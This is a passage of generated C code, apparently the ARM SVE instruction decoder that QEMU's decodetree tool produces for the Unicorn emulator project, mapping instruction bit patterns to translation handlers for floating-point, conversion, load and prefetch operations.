return true; return false; case 0x1: /* 01100101 ..001001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:819 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FSCALE(ctx, &u.f_rprr_esz)) return true; return false; case 0x2: /* 01100101 ..001010 100..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:820 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMULX(ctx, &u.f_rprr_esz)) return true; return false; case 0x4: /* 01100101 ..001100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:821 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_FDIV(ctx, &u.f_rprr_esz)) return true; return false; case 0x5: /* 01100101 ..001101 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:822 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FDIV(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x2: /* 01100101 ..010... 100..... ........ */ disas_sve_extract_disas_sve_Fmt_87(ctx, &u.f_disas_sve46, insn); switch ((insn >> 10) & 0x7) { case 0x0: /* 01100101 ..010... 100000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:835 */ if (trans_FTMAD(ctx, &u.f_disas_sve46)) return true; return false; } return false; case 0x3: /* 01100101 ..011... 100..... ........ */ disas_sve_extract_rdn_i1(ctx, &u.f_rpri_esz, insn); switch (insn & 0x000703c0) { case 0x00000000: /* 01100101 ..011000 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:825 */ if (trans_FADD_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00010000: /* 01100101 ..011001 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:826 */ if (trans_FSUB_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00020000: /* 01100101 ..011010 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:827 */ if (trans_FMUL_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00030000: /* 01100101 ..011011 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:828 */ if (trans_FSUBR_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00040000: /* 01100101 ..011100 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:829 */ if (trans_FMAXNM_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00050000: /* 01100101 ..011101 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:830 */ if (trans_FMINNM_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00060000: /* 01100101 ..011110 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:831 */ if (trans_FMAX_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00070000: /* 01100101 ..011111 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:832 */ if (trans_FMIN_zpzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; } return false; case 0x1: /* 01100101 ..0..... 101..... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 01100101 ..000000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:880 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTN(ctx, &u.f_rpr_esz)) return true; return false; case 0x1: /* 01100101 ..000001 101..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:881 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTP(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 ..000010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:882 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTM(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 ..000011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:883 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTZ(ctx, &u.f_rpr_esz)) return true; return false; case 0x4: /* 01100101 ..000100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:884 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTA(ctx, &u.f_rpr_esz)) return true; return false; case 0x6: /* 01100101 ..000110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:885 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTX(ctx, &u.f_rpr_esz)) return true; return false; case 0x7: /* 01100101 ..000111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:886 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTI(ctx, &u.f_rpr_esz)) return true; return false; case 0x8: /* 01100101 ..001000 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x2: /* 01100101 10001000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:856 */ if (trans_FCVT_sh(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11001000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:858 */ if (trans_FCVT_dh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x9: /* 01100101 ..001001 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x2: /* 01100101 10001001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:857 */ if (trans_FCVT_hs(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11001001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:859 */ if (trans_FCVT_hd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0xa: /* 01100101 ..001010 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11001010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:860 */ if (trans_FCVT_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0xb: /* 01100101 ..001011 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11001011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:861 */ if (trans_FCVT_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0xc: /* 01100101 ..001100 101..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:889 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRECPX(ctx, &u.f_rpr_esz)) return true; return false; case 0xd: /* 01100101 ..001101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:890 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FSQRT(ctx, &u.f_rpr_esz)) return true; return false; case 0x10: /* 01100101 ..010000 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11010000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:897 */ if (trans_SCVTF_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x11: /* 01100101 ..010001 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11010001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:905 */ if (trans_UCVTF_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x12: /* 01100101 ..010010 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:893 */ if (trans_SCVTF_hh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x13: /* 01100101 ..010011 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:901 */ if (trans_UCVTF_hh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x14: /* 01100101 ..010100 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:894 */ if (trans_SCVTF_sh(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 10010100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:896 */ if (trans_SCVTF_ss(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11010100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:898 */ if (trans_SCVTF_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x15: /* 01100101 ..010101 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:902 */ if (trans_UCVTF_sh(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 10010101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:904 */ if (trans_UCVTF_ss(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11010101 101..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:906 */ if (trans_UCVTF_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x16: /* 01100101 ..010110 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:895 */ if (trans_SCVTF_dh(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11010110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:899 */ if (trans_SCVTF_dd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x17: /* 01100101 ..010111 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:903 */ if (trans_UCVTF_dh(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11010111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:907 */ if (trans_UCVTF_dd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x18: /* 01100101 ..011000 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11011000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:872 */ if (trans_FCVTZS_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x19: /* 01100101 ..011001 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11011001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:873 */ if (trans_FCVTZU_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1a: /* 01100101 ..011010 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:864 */ if (trans_FCVTZS_hh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1b: /* 01100101 ..011011 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:865 */ if (trans_FCVTZU_hh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1c: /* 01100101 ..011100 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:866 */ if (trans_FCVTZS_hs(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 10011100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:870 */ if (trans_FCVTZS_ss(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11011100 101..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:874 */ if (trans_FCVTZS_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1d: /* 01100101 ..011101 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:867 */ if (trans_FCVTZU_hs(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 10011101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:871 */ if (trans_FCVTZU_ss(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11011101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:875 */ if (trans_FCVTZU_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1e: /* 01100101 ..011110 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:868 */ if (trans_FCVTZS_hd(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11011110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:876 */ if (trans_FCVTZS_dd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1f: /* 01100101 ..011111 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:869 */ if (trans_FCVTZU_hd(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11011111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:877 */ if (trans_FCVTZU_dd(ctx, &u.f_rpr_esz)) return true; return false; } return false; } return false; case 0x2: /* 01100101 ..0..... 110..... ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..0..... 110..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:345 */ if (trans_FCMUO_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..0..... 110..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:346 */ if (trans_FACGE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x3: /* 01100101 ..0..... 111..... ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x1: /* 01100101 ..0..... 111..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:347 */ if (trans_FACGT_ppzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; } return false; case 0x01200000: /* 01100101 ..1..... 0....... ........ */ disas_sve_extract_rda_pg_rn_rm(ctx, &u.f_rprrr_esz, insn); switch ((insn >> 13) & 0x3) { case 0x0: /* 01100101 ..1..... 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:840 */ if (trans_FMLA_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x1: /* 01100101 ..1..... 001..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:841 */ if (trans_FMLS_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x2: /* 01100101 ..1..... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:842 */ if (trans_FNMLA_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x3: /* 01100101 ..1..... 011..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:843 */ if (trans_FNMLS_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; } return false; case 0x01208000: /* 01100101 ..1..... 1....... ........ */ disas_sve_extract_rdn_pg_rm_ra(ctx, &u.f_rprrr_esz, insn); switch ((insn >> 13) & 0x3) { case 0x0: /* 01100101 ..1..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:848 */ if (trans_FMLA_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x1: /* 01100101 ..1..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:849 */ if (trans_FMLS_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x2: /* 01100101 ..1..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:850 */ if (trans_FNMLA_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x3: /* 01100101 ..1..... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:851 */ if (trans_FNMLS_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; } return false; } return false; case 0x42: /* 1000010. ........ ........ ........ */ switch ((insn >> 15) & 0x1) { case 0x0: /* 1000010. ........ 0....... ........ */ switch ((insn >> 23) & 0x3) { case 0x0: /* 10000100 0....... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 10000100 0.0..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:923 */ disas_sve_extract_rprr_g_load_xs_u(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 2; u.f_rprr_gather_load.msz = 0; u.f_rprr_gather_load.scale = 0; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x1: /* 10000100 0.1..... 0....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 10000100 0.1..... 0....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:970 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; case 0x1: /* 10000100 1....... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:925 */ disas_sve_extract_rprr_g_load_xs_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 2; u.f_rprr_gather_load.msz = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x2: /* 10000101 0....... 0....... ........ */ disas_sve_extract_rprr_g_load_xs_sc(ctx, &u.f_rprr_gather_load, insn); switch ((insn >> 14) & 0x1) { case 0x1: /* 10000101 0....... 01...... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:927 */ u.f_rprr_gather_load.esz = 2; u.f_rprr_gather_load.msz = 2; u.f_rprr_gather_load.u = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; } return false; case 0x3: /* 10000101 1....... 0....... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 10000101 10...... 0....... ........ */ switch ((insn >> 13) & 0x3) { case 0x0: /* 10000101 10...... 000..... ........ */ disas_sve_extract_pd_rn_i9(ctx, &u.f_rri, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 10000101 10...... 000..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:912 */ if (trans_LDR_pri(ctx, &u.f_rri)) return true; return false; } return false; case 0x2: /* 10000101 10...... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:915 */ disas_sve_extract_rd_rn_i9(ctx, &u.f_rri, insn); if (trans_LDR_zri(ctx, &u.f_rri)) return true; return false; } return false; case 0x1: /* 10000101 11...... 0....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 10000101 11...... 0....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:976 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; } return false; case 0x1: /* 1000010. ........ 1....... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 1000010. .0...... 1....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 1000010. .00..... 1....... ........ */ switch (insn & 0x00006010) { case 0x00004000: /* 1000010. .00..... 110..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:979 */ disas_sve_extract_disas_sve_Fmt_89(ctx, &u.f_disas_sve47, insn); if (trans_PRF_rr(ctx, &u.f_disas_sve47)) return true; return false; case 0x00006000: /* 1000010. .00..... 111..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:973 */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; case 0x1: /* 1000010. .01..... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:931 */ disas_sve_extract_rpri_g_load(ctx, &u.f_rpri_gather_load, insn); u.f_rpri_gather_load.esz = 2; if (trans_LD1_zpiz(ctx, &u.f_rpri_gather_load)) return true; return false; } return false; case 0x1: /* 1000010. .1...... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:918 */ disas_sve_extract_disas_sve_Fmt_88(ctx, &u.f_rpri_load, insn); if (trans_LD1R_zpri(ctx, &u.f_rpri_load)) return true; return false; } return false; } return false; case 0x52: /* 1010010. ........ ........ ........ */ switch ((insn >> 13) & 0x7) { case 0x0: /* 1010010. ........ 000..... ........ */ disas_sve_extract_rprr_load_msz(ctx, &u.f_rprr_load, insn); switch ((insn >> 21) & 0x3) { case 0x0: /* 1010010. .00..... 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:961 */ u.f_rprr_load.nreg = 0; if (trans_LD1RQ_zprr(ctx, &u.f_rprr_load)) return true; return false; } return false; case 0x1: /* 1010010. ........ 001..... ........ 
*/ disas_sve_extract_rpri_load_msz(ctx, &u.f_rpri_load, insn); switch ((insn >> 20) & 0x7) { case 0x0: /* 1010010. .000.... 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:966 */ u.f_rpri_load.nreg = 0; if (trans_LD1RQ_zpri(ctx, &u.f_rpri_load)) return true; return false; } return false; case 0x2: /* 1010010. ........ 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:937 */ disas_sve_extract_rprr_load_dt(ctx, &u.f_rprr_load, insn); u.f_rprr_load.nreg = 0; if (trans_LD_zprr(ctx, &u.f_rprr_load)) return true; return false; case 0x3: /* 1010010. ........ 011..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:940 */ disas_sve_extract_rprr_load_dt(ctx, &u.f_rprr_load, insn); u.f_rprr_load.nreg = 0; if (trans_LDFF1_zprr(ctx, &u.f_rprr_load)) return true; return false; case 0x5: /* 1010010. ........ 101..... ........ */ disas_sve_extract_rpri_load_dt(ctx, &u.f_rpri_load, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 1010010. ...0.... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:943 */ u.f_rpri_load.nreg = 0; if (trans_LD_zpri(ctx, &u.f_rpri_load)) return true; return false; case 0x1: /* 1010010. ...1.... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:946 */ u.f_rpri_load.nreg = 0; if (trans_LDNF1_zpri(ctx, &u.f_rpri_load)) return true; return false; } return false; case 0x6: /* 1010010. ........ 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:952 */ disas_sve_extract_rprr_load_msz(ctx, &u.f_rprr_load, insn); u.f_rprr_load.nreg = extract32(insn, 21, 2); if 